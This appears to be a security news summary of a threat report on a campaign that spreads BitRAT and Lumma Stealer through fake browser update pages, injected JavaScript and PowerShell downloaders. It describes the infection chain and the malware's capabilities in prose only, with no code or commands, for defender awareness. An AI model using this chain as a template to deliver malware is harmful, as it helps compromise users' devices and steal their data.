%20(1).webp "Be wary of false browser updates")
eSentire’s Threat Response Unit (TRU) recently uncovered a sophisticated malware campaign that is utilizing fake browser updates to distribute two dangerous malware variants: BitRAT and Lumma Stealer. This campaign has been attributed to severe security breaches that could potentially impact numerous users.
The attackers behind this campaign have been employing deceptive tactics to trick unsuspecting users into downloading malicious files. Through the use of fake update mechanisms, they are able to lure individuals into compromising their devices and data unknowingly. eSentire’s TRU was able to identify an instance of fake updates delivering BitRAT and Lumma Stealer, highlighting the prevalence of this method among cybercriminals.
The infection chain for this malware campaign begins when a user visits a webpage that contains injected malicious JavaScript code. This code redirects the user to a fake update page where they are prompted to download a ZIP archive named ‘Update.zip’. This archive, which is hosted on Discord’s Content Distribution Network (CDN), contains a JavaScript file (Update.js) that acts as an initial downloader to retrieve the payloads once executed by the victim.
Within the ZIP archive, several PowerShell scripts are responsible for downloading and executing the next stage loader and payloads from a known BitRAT Command-and-Control (C2) address. The attack involves multiple files, each serving different purposes, such as loader mechanisms and persistence mechanisms for the malware payloads.
The BitRAT malware, one of the variants distributed through this campaign, is a feature-rich remote access tool with capabilities that include various modes of connections, UAC exploit for elevated privileges, process protection, cryptocurrency mining, and remote desktop access, among others. The BitRAT sample analyzed was found to be UPX-packed and contained an encrypted configuration that required decryption using a specific key.
On the other hand, Lumma Stealer, another malware variant distributed in this campaign, is an information-stealing malware developed in C language. It specifically targets cryptocurrency wallets, 2FA browser extensions, and other sensitive data on victims’ machines. The stolen data is then sent to a Command-and-Control (C2) server via HTTP POST requests.
The use of fake updates to deliver these malware variants showcases the operators’ ability to exploit trusted names to maximize the reach and impact of their attacks. The interchangeable nature of the malware payload suggests that similar incidents utilizing fake update mechanisms could occur in the future with varying types of malware being distributed.
Overall, this malware campaign underscores the importance of vigilance and cybersecurity awareness among users to prevent falling victim to such deceptive tactics. As cybercriminals continue to evolve their strategies, it is essential for individuals and organizations to stay informed and take proactive measures to safeguard their digital assets and data.